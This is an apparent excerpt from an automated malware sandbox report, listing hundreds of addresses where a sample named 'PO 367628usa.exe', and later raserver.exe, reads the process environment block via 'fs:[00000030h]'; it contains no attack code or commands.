          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018FF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018FF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018FF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_019090AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0195B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0195B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0195B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0195B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0195B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0195B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018C58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018C40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018C40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018C40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01947016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01947016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01947016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01994015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01994015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018E0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018E0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01982073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01991074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018D1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018D1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0198138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0197D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018FB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01995BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_019453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_019453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018EDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0198131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01998B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018CDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018CF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018CDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018FD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018FD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018DAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018DAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018FFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018D8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0198AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0198AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018E3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018C5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01904A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01904A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01954257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0198EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0190927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0197B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0197B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01998A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_019905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_019905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01946DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01946DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01946DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01946DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01946DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01946DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01978DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0198FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0198FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0198FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0198FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0198E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0194A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01998D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018CAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01903D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01943540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01973D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018E7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018D849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01998CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_019814FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01946CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01946CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01946CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0199740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0199740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0199740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01946C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01946C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01946C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01946C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018FBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018FA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0195C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0195C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018E746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01947794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01947794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01947794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018D8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_019037F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018FA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018FA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0195FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0195FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0199070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0199070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018EF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018FE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018DEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018DFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01998F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0195FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_019446A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01990EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01990EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01990EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01998ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0197FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01908EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018D76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01981608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018FA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018FA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0197FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018CE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0198AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0198AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018D766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04CA8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BE849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C914FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C56CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C56CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C56CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C0A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C6C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C6C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04CA740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04CA740D mov eax, dword ptr fs:[00000030h]
